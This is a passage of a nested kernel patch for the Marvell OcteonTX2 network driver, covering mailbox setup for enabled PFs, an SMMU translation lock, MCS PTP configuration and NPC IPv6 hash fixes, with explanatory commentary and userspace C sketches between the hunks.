++			cfg &= ~BIT_ULL(lmac_id);
++		mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION, cfg);
++		return;
++	}
++	/* CN10KB */
++	mcs = mcs_get_pdata(0);
++	port = (rpm_id * rvu->hw->lmac_per_cgx) + lmac_id;
++	cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port));
++	if (ena)
++		cfg |= BIT_ULL(0);
++	else
++		cfg &= ~BIT_ULL(0);
++	mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port), cfg);
++}
++
+ int rvu_mbox_handler_mcs_set_lmac_mode(struct rvu *rvu,
+ 				       struct mcs_set_lmac_mode *req,
+ 				       struct msg_rsp *rsp)
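The helper above has to cope with two register layouts: on the multi-block (CNF10K-B) parts every LMAC of an RPM owns one bit of a shared PEX configuration register, while on the single-block (CN10KB) part each port has its own register and only bit 0 matters. A userspace sketch of the same read-modify-write, with reg[] standing in for mcs_reg_read()/mcs_reg_write() and the layout invented for illustration:

#include <stdbool.h>
#include <stdint.h>

static uint64_t reg[16];	/* fake register file */

/* one shared register, one enable bit per LMAC */
static void ptp_cfg_shared(int lmac_id, bool ena)
{
	uint64_t cfg = reg[0];

	if (ena)
		cfg |= 1ULL << lmac_id;
	else
		cfg &= ~(1ULL << lmac_id);
	reg[0] = cfg;
}

/* one register per port, enable in bit 0 */
static void ptp_cfg_per_port(int port, bool ena)
{
	uint64_t cfg = reg[1 + port];

	if (ena)
		cfg |= 1ULL;
	else
		cfg &= ~1ULL;
	reg[1 + port] = cfg;
}

int main(void)
{
	ptp_cfg_shared(2, true);	/* CNF10K-B style */
	ptp_cfg_per_port(5, true);	/* CN10KB style */
	return 0;
}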
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 3f5e09b77d4bd..873f081c030de 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -2274,7 +2274,7 @@ static inline void rvu_afvf_mbox_up_handler(struct work_struct *work)
+ }
+ 
+ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+-				int num, int type)
++				int num, int type, unsigned long *pf_bmap)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	int region;
+@@ -2286,6 +2286,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 */
+ 	if (type == TYPE_AFVF) {
+ 		for (region = 0; region < num; region++) {
++			if (!test_bit(region, pf_bmap))
++				continue;
++
+ 			if (hw->cap.per_pf_mbox_regs) {
+ 				bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 						  RVU_AF_PFX_BAR4_ADDR(0)) +
+@@ -2307,6 +2310,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 * RVU_AF_PF_BAR4_ADDR register.
+ 	 */
+ 	for (region = 0; region < num; region++) {
++		if (!test_bit(region, pf_bmap))
++			continue;
++
+ 		if (hw->cap.per_pf_mbox_regs) {
+ 			bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 					  RVU_AF_PFX_BAR4_ADDR(region));
+@@ -2335,20 +2341,41 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	int err = -EINVAL, i, dir, dir_up;
+ 	void __iomem *reg_base;
+ 	struct rvu_work *mwork;
++	unsigned long *pf_bmap;
+ 	void **mbox_regions;
+ 	const char *name;
++	u64 cfg;
+ 
+-	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
+-	if (!mbox_regions)
++	pf_bmap = bitmap_zalloc(num, GFP_KERNEL);
++	if (!pf_bmap)
+ 		return -ENOMEM;
+ 
++	/* RVU VFs */
++	if (type == TYPE_AFVF)
++		bitmap_set(pf_bmap, 0, num);
++
++	if (type == TYPE_AFPF) {
++		/* Mark enabled PFs in bitmap */
++		for (i = 0; i < num; i++) {
++			cfg = rvu_read64(rvu, BLKADDR_RVUM, RVU_PRIV_PFX_CFG(i));
++			if (cfg & BIT_ULL(20))
++				set_bit(i, pf_bmap);
++		}
++	}
++
++	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
++	if (!mbox_regions) {
++		err = -ENOMEM;
++		goto free_bitmap;
++	}
++
+ 	switch (type) {
+ 	case TYPE_AFPF:
+ 		name = "rvu_afpf_mailbox";
+ 		dir = MBOX_DIR_AFPF;
+ 		dir_up = MBOX_DIR_AFPF_UP;
+ 		reg_base = rvu->afreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2357,7 +2384,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		dir = MBOX_DIR_PFVF;
+ 		dir_up = MBOX_DIR_PFVF_UP;
+ 		reg_base = rvu->pfreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2388,16 +2415,19 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	}
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox, mbox_regions, rvu->pdev,
+-				     reg_base, dir, num);
++				     reg_base, dir, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox_up, mbox_regions, rvu->pdev,
+-				     reg_base, dir_up, num);
++				     reg_base, dir_up, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	for (i = 0; i < num; i++) {
++		if (!test_bit(i, pf_bmap))
++			continue;
++
+ 		mwork = &mw->mbox_wrk[i];
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_handler);
+@@ -2406,8 +2436,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_up_handler);
+ 	}
+-	kfree(mbox_regions);
+-	return 0;
++	goto free_regions;
+ 
+ exit:
+ 	destroy_workqueue(mw->mbox_wq);
+@@ -2416,6 +2445,8 @@ unmap_regions:
+ 		iounmap((void __iomem *)mbox_regions[num]);
+ free_regions:
+ 	kfree(mbox_regions);
++free_bitmap:
++	bitmap_free(pf_bmap);
+ 	return err;
+ }
+ 
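The mailbox rework above boils down to: build a bitmap of the PFs that are actually enabled (bit 20 of the per-PF config register, per the hunk), skip the disabled ones when mapping regions and initializing work items, and free the bitmap on every exit path. A reduced userspace analogue of the bitmap side, with cfg_of() standing in for the rvu_read64() of RVU_PRIV_PFX_CFG and its values made up:

#include <stdint.h>
#include <stdio.h>

#define PF_ENA (1ULL << 20)

static uint64_t cfg_of(int pf)
{
	return (pf % 2) ? PF_ENA : 0;	/* fake: odd-numbered PFs enabled */
}

int main(void)
{
	uint64_t pf_bmap = 0;
	int num = 8, i;

	/* mark enabled PFs in the bitmap */
	for (i = 0; i < num; i++)
		if (cfg_of(i) & PF_ENA)
			pf_bmap |= 1ULL << i;

	for (i = 0; i < num; i++) {
		if (!(pf_bmap & (1ULL << i)))
			continue;	/* skip disabled PFs entirely */
		printf("init mbox region for PF %d\n", i);
	}
	return 0;
}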
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index f6c45cf27caf4..f0502556d127f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -899,6 +899,7 @@ int rvu_get_hwvf(struct rvu *rvu, int pcifunc);
+ /* CN10K MCS */
+ int rvu_mcs_init(struct rvu *rvu);
+ int rvu_mcs_flr_handler(struct rvu *rvu, u16 pcifunc);
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena);
+ void rvu_mcs_exit(struct rvu *rvu);
+ 
+ #endif /* RVU_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index 438b212fb54a7..83b342fa8d753 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -773,6 +773,8 @@ static int rvu_cgx_ptp_rx_cfg(struct rvu *rvu, u16 pcifunc, bool enable)
+ 	/* This flag is required to clean up CGX conf if app gets killed */
+ 	pfvf->hw_rx_tstamp_en = enable;
+ 
++	/* Inform MCS about 8B RX header */
++	rvu_mcs_ptp_cfg(rvu, cgx_id, lmac_id, enable);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+index 7dbbc115cde42..f9faa5b23bb9d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+@@ -60,13 +60,14 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 			   u64 iova, u64 *lmt_addr)
+ {
+ 	u64 pa, val, pf;
+-	int err;
++	int err = 0;
+ 
+ 	if (!iova) {
+ 		dev_err(rvu->dev, "%s Requested Null address for translation\n", __func__);
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&rvu->rsrc_lock);
+ 	rvu_write64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_REQ, iova);
+ 	pf = rvu_get_pf(pcifunc) & 0x1F;
+ 	val = BIT_ULL(63) | BIT_ULL(14) | BIT_ULL(13) | pf << 8 |
+@@ -76,12 +77,13 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	err = rvu_poll_reg(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS, BIT_ULL(0), false);
+ 	if (err) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova translation failed\n", __func__);
+-		return err;
++		goto exit;
+ 	}
+ 	val = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS);
+ 	if (val & ~0x1ULL) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova translation failed err:%llx\n", __func__, val);
+-		return -EIO;
++		err = -EIO;
++		goto exit;
+ 	}
+ 	/* PA[51:12] = RVU_AF_SMMU_TLN_FLIT0[57:18]
+ 	 * PA[11:0] = IOVA[11:0]
+@@ -89,8 +91,9 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	pa = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_TLN_FLIT0) >> 18;
+ 	pa &= GENMASK_ULL(39, 0);
+ 	*lmt_addr = (pa << 12) | (iova  & 0xFFF);
+-
+-	return 0;
++exit:
++	mutex_unlock(&rvu->rsrc_lock);
++	return err;
+ }
+ 
+ static int rvu_update_lmtaddr(struct rvu *rvu, u16 pcifunc, u64 lmt_addr)
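The change above is a classic single-exit locking conversion: the SMMU address-translation sequence is a multi-register transaction, so it is wrapped in rsrc_lock, and the two early returns become gotos so the lock is released exactly once. A runnable pthread analogue of the shape, where do_poll() is a stand-in for rvu_poll_reg() and the translation result is fake:

#include <errno.h>
#include <pthread.h>
#include <stdint.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static int do_poll(void)
{
	return 0;		/* stand-in for rvu_poll_reg() */
}

static int translate(uint64_t iova, uint64_t *out)
{
	int err = 0;

	if (!iova)
		return -EINVAL;	/* argument checks happen before taking the lock */

	pthread_mutex_lock(&lock);
	err = do_poll();
	if (err)
		goto exit;	/* never return early with the lock held */
	*out = iova | 1;	/* fake translation result */
exit:
	pthread_mutex_unlock(&lock);
	return err;
}

int main(void)
{
	uint64_t addr;

	return translate(0x1000, &addr);
}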
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index 26cfa501f1a11..9533b1d929604 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -497,8 +497,9 @@ static int rvu_dbg_mcs_rx_secy_stats_display(struct seq_file *filp, void *unused
+ 			   stats.octet_validated_cnt);
+ 		seq_printf(filp, "secy%d: Pkts on disabled port: %lld\n", secy_id,
+ 			   stats.pkt_port_disabled_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_badtag_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_nosa_cnt);
++		seq_printf(filp, "secy%d: Pkts with badtag: %lld\n", secy_id, stats.pkt_badtag_cnt);
++		seq_printf(filp, "secy%d: Pkts with no SA(sectag.tci.c=0): %lld\n", secy_id,
++			   stats.pkt_nosa_cnt);
+ 		seq_printf(filp, "secy%d: Pkts with nosaerror: %lld\n", secy_id,
+ 			   stats.pkt_nosaerror_cnt);
+ 		seq_printf(filp, "secy%d: Tagged ctrl pkts: %lld\n", secy_id,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+index 006beb5cf98dd..952319453701b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+@@ -13,11 +13,6 @@
+ #include "rvu_npc_fs.h"
+ #include "rvu_npc_hash.h"
+ 
+-#define NPC_BYTESM		GENMASK_ULL(19, 16)
+-#define NPC_HDR_OFFSET		GENMASK_ULL(15, 8)
+-#define NPC_KEY_OFFSET		GENMASK_ULL(5, 0)
+-#define NPC_LDATA_EN		BIT_ULL(7)
+-
+ static const char * const npc_flow_names[] = {
+ 	[NPC_DMAC]	= "dmac",
+ 	[NPC_SMAC]	= "smac",
+@@ -442,6 +437,7 @@ done:
+ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 			   u8 lt, u64 cfg, u8 intf)
+ {
++	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+ 	u8 hdr, key, nr_bytes, bit_offset;
+ 	u8 la_ltype, la_start;
+@@ -490,8 +486,21 @@ do {									       \
+ 	NPC_SCAN_HDR(NPC_SIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 12, 4);
+ 	NPC_SCAN_HDR(NPC_DIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 16, 4);
+ 	NPC_SCAN_HDR(NPC_IPFRAG_IPV6, NPC_LID_LC, NPC_LT_LC_IP6_EXT, 6, 1);
+-	NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
+-	NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	if (rvu->hw->cap.npc_hash_extract) {
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][0])
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 4);
++		else
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][1])
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 4);
++		else
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	} else {
++		NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++		NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	}
++
+ 	NPC_SCAN_HDR(NPC_SPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 0, 2);
+ 	NPC_SCAN_HDR(NPC_DPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 2, 2);
+ 	NPC_SCAN_HDR(NPC_SPORT_TCP, NPC_LID_LD, NPC_LT_LD_TCP, 0, 2);
+@@ -594,8 +603,7 @@ static int npc_scan_kex(struct rvu *rvu, int blkaddr, u8 intf)
+ 	 */
+ 	masked_cfg = cfg & NPC_EXACT_NIBBLE;
+ 	bitnr = NPC_EXACT_NIBBLE_START;
+-	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg,
+-			      NPC_EXACT_NIBBLE_START) {
++	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg, NPC_EXACT_NIBBLE_END + 1) {
+ 		npc_scan_exact_result(mcam, bitnr, key_nibble, intf);
+ 		key_nibble++;
+ 	}
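The one-liner above fixes the loop bound: the last argument of for_each_set_bit_from() is the total bitmap size, i.e. the exclusive end, and passing the start bit there makes the loop body unreachable. A small sketch of the corrected semantics, with made-up start/end values and an open-coded bit walk in place of the kernel macro:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint64_t cfg = 0xF00;		/* example: nibble bits set at 8-11 */
	int start = 8, end = 12;	/* scan [start, end), like START..END+1 */
	int bit;

	for (bit = start; bit < end; bit++)
		if (cfg & (1ULL << bit))
			printf("scan exact-match nibble at bit %d\n", bit);
	return 0;
}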
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+index bdd65ce56a32d..3f5c9042d10e7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+@@ -9,6 +9,10 @@
+ #define __RVU_NPC_FS_H
+ 
+ #define IPV6_WORDS	4
++#define NPC_BYTESM	GENMASK_ULL(19, 16)
++#define NPC_HDR_OFFSET	GENMASK_ULL(15, 8)
++#define NPC_KEY_OFFSET	GENMASK_ULL(5, 0)
++#define NPC_LDATA_EN	BIT_ULL(7)
+ 
+ void npc_update_entry(struct rvu *rvu, enum key_fields type,
+ 		      struct mcam_entry *entry, u64 val_lo,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index f69102d20c903..b6e885263245c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -78,42 +78,43 @@ static u32 rvu_npc_toeplitz_hash(const u64 *data, u64 *key, size_t data_bit_len,
+ 	return hash_out;
+ }
+ 
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx)
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx)
+ {
+ 	u64 hash_key[3];
+ 	u64 data_padded[2];
+ 	u32 field_hash;
+ 
+-	hash_key[0] = secret_key[1] << 31;
+-	hash_key[0] |= secret_key[2];
+-	hash_key[1] = secret_key[1] >> 33;
+-	hash_key[1] |= secret_key[0] << 31;
+-	hash_key[2] = secret_key[0] >> 33;
++	hash_key[0] = rsp.secret_key[1] << 31;
++	hash_key[0] |= rsp.secret_key[2];
++	hash_key[1] = rsp.secret_key[1] >> 33;
++	hash_key[1] |= rsp.secret_key[0] << 31;
++	hash_key[2] = rsp.secret_key[0] >> 33;
+ 
+-	data_padded[0] = mkex_hash->hash_mask[intf][hash_idx][0] & ldata[0];
+-	data_padded[1] = mkex_hash->hash_mask[intf][hash_idx][1] & ldata[1];
++	data_padded[0] = rsp.hash_mask[intf][hash_idx][0] & ldata[0];
++	data_padded[1] = rsp.hash_mask[intf][hash_idx][1] & ldata[1];
+ 	field_hash = rvu_npc_toeplitz_hash(data_padded, hash_key, 128, 159);
+ 
+-	field_hash &= mkex_hash->hash_ctrl[intf][hash_idx] >> 32;
+-	field_hash |= mkex_hash->hash_ctrl[intf][hash_idx];
++	field_hash &= FIELD_GET(GENMASK(63, 32), rsp.hash_ctrl[intf][hash_idx]);
++	field_hash += FIELD_GET(GENMASK(31, 0), rsp.hash_ctrl[intf][hash_idx]);
+ 	return field_hash;
+ }
+ 
+-static u64 npc_update_use_hash(int lt, int ld)
++static u64 npc_update_use_hash(struct rvu *rvu, int blkaddr,
++			       u8 intf, int lid, int lt, int ld)
+ {
+-	u64 cfg = 0;
+-
+-	switch (lt) {
+-	case NPC_LT_LC_IP6:
+-		/* Update use_hash(bit-20) and bytesm1 (bit-16:19)
+-		 * in KEX_LD_CFG
+-		 */
+-		cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
+-					  ld ? 0x8 : 0x18,
+-					  0x1, 0x0, 0x10);
+-		break;
+-	}
++	u8 hdr, key;
++	u64 cfg;
++
++	cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_LIDX_LTX_LDX_CFG(intf, lid, lt, ld));
++	hdr = FIELD_GET(NPC_HDR_OFFSET, cfg);
++	key = FIELD_GET(NPC_KEY_OFFSET, cfg);
++
++	/* Update use_hash(bit-20) to 'true' and
++	 * bytesm1(bit-16:19) to '0x3' in KEX_LD_CFG
++	 */
++	cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
++				  hdr, 0x1, 0x0, key);
+ 
+ 	return cfg;
+ }
+@@ -132,12 +133,13 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++) {
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -149,6 +151,8 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 							     mkex_hash->hash_mask[intf][ld][1]);
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
++
++					hash_cnt++;
+ 				}
+ 			}
+ 		}
+@@ -169,12 +173,13 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++)
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -187,8 +192,6 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
+ 					hash_cnt++;
+-					if (hash_cnt == NPC_MAX_HASH)
+-						return;
+ 				}
+ 		}
+ 	}
+@@ -242,8 +245,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask)
+ {
+ 	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+-	struct npc_get_secret_key_req req;
+-	struct npc_get_secret_key_rsp rsp;
++	struct npc_get_field_hash_info_req req;
++	struct npc_get_field_hash_info_rsp rsp;
+ 	u64 ldata[2], cfg;
+ 	u32 field_hash;
+ 	u8 hash_idx;
+@@ -254,7 +257,7 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ 
+ 	req.intf = intf;
+-	rvu_mbox_handler_npc_get_secret_key(rvu, &req, &rsp);
++	rvu_mbox_handler_npc_get_field_hash_info(rvu, &req, &rsp);
+ 
+ 	for (hash_idx = 0; hash_idx < NPC_MAX_HASH; hash_idx++) {
+ 		cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_CFG(intf, hash_idx));
+@@ -270,44 +273,45 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 				 * is hashed to 32 bit value.
+ 				 */
+ 				case NPC_LT_LC_IP6:
+-					if (features & BIT_ULL(NPC_SIP_IPV6)) {
++					/* ld[0] == hash_idx[0] == Source IPv6
++					 * ld[1] == hash_idx[1] == Destination IPv6
++					 */
++					if ((features & BIT_ULL(NPC_SIP_IPV6)) && !hash_idx) {
+ 						u32 src_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(src_ip, pkt->ip6src, IPV6_WORDS);
+-						ldata[0] = (u64)src_ip[0] << 32 | src_ip[1];
+-						ldata[1] = (u64)src_ip[2] << 32 | src_ip[3];
++						ldata[1] = (u64)src_ip[0] << 32 | src_ip[1];
++						ldata[0] = (u64)src_ip[2] << 32 | src_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_SIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6src, &pkt->ip6src,
+ 						       sizeof(pkt->ip6src));
+ 						memcpy(&omask->ip6src, &mask->ip6src,
+ 						       sizeof(mask->ip6src));
+-						break;
+-					}
+-
+-					if (features & BIT_ULL(NPC_DIP_IPV6)) {
++					} else if ((features & BIT_ULL(NPC_DIP_IPV6)) && hash_idx) {
+ 						u32 dst_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(dst_ip, pkt->ip6dst, IPV6_WORDS);
+-						ldata[0] = (u64)dst_ip[0] << 32 | dst_ip[1];
+-						ldata[1] = (u64)dst_ip[2] << 32 | dst_ip[3];
++						ldata[1] = (u64)dst_ip[0] << 32 | dst_ip[1];
++						ldata[0] = (u64)dst_ip[2] << 32 | dst_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_DIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6dst, &pkt->ip6dst,
+ 						       sizeof(pkt->ip6dst));
+ 						memcpy(&omask->ip6dst, &mask->ip6dst,
+ 						       sizeof(mask->ip6dst));
+ 					}
++
+ 					break;
+ 				}
+ 			}
+@@ -315,13 +319,13 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ }
+ 
+-int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+-					struct npc_get_secret_key_req *req,
+-					struct npc_get_secret_key_rsp *rsp)
++int rvu_mbox_handler_npc_get_field_hash_info(struct rvu *rvu,
++					     struct npc_get_field_hash_info_req *req,
++					     struct npc_get_field_hash_info_rsp *rsp)
+ {
+ 	u64 *secret_key = rsp->secret_key;
+ 	u8 intf = req->intf;
+-	int blkaddr;
++	int i, j, blkaddr;
+ 
+ 	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
+ 	if (blkaddr < 0) {
+@@ -333,6 +337,19 @@ int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+ 	secret_key[1] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY1(intf));
+ 	secret_key[2] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY2(intf));
+ 
++	for (i = 0; i < NPC_MAX_HASH; i++) {
++		for (j = 0; j < NPC_MAX_HASH_MASK; j++) {
++			rsp->hash_mask[NIX_INTF_RX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_RX, i, j);
++			rsp->hash_mask[NIX_INTF_TX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_TX, i, j);
++		}
++	}
++
++	for (i = 0; i < NPC_MAX_INTF; i++)
++		for (j = 0; j < NPC_MAX_HASH; j++)
++			rsp->hash_ctrl[i][j] = GET_KEX_LD_HASH_CTRL(i, j);
++
+ 	return 0;
+ }
+ 
+@@ -1878,9 +1895,9 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 	rvu->hw->table = table;
+ 
+ 	/* Read table size, ways and depth */
+-	table->mem_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 	table->mem_table.ways = FIELD_GET(GENMASK_ULL(19, 16), npc_const3);
+-	table->cam_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
